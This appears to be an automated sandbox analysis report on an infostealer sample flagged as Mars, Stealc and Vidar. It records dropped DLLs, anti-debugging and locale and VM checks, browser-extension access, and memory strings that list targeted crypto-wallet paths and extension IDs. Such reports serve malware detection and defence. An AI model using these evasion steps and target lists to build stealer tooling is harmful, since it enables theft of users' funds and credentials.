Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF8EE5 push ecx; ret		0_2_00EF8EF8
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B536 push ecx; ret		0_2_6C50B549

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

0_2_00EF76E0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-78789

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

API coverage: 6.2 %

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEEDE0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EEEDE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED1F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EED1F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF3560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF3560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEB630 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EEB630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE1600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EE1600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEDB90 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00EEDB90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2B70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00EF2B70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEE450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00EEE450
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF31E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00EF31E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED570 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EED570
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2630 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF2630

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5DA0 GetSystemInfo,wsprintfA,

0_2_00EF5DA0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node	graph_0-78793
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node	graph_0-79820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node	graph_0-78776
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node	graph_0-78773
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node	graph_0-78796
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node	graph_0-78788
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node	graph_0-78817
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node	graph_0-78601

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EF8BFD

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

0_2_00EF76E0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF75D0 mov eax, dword ptr fs:[00000030h]

0_2_00EF75D0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EE6CD0 memset,RegOpenKeyExA,RegEnumValueA,StrStrA,GetProcessHeap,HeapFree,task,

0_2_00EE6CD0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EFB5E7 SetUnhandledExceptionFilter,	0_2_00EFB5E7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EF8BFD
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF936E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EF936E
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C50B66C
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C50B1F7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C6BAC62

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF7510 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00EF7510

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_6C50B341 cpuid

0_2_6C50B341

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00EF5A60

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5850 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00EF5850

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5720 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00EF5720

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5900 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00EF5900

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
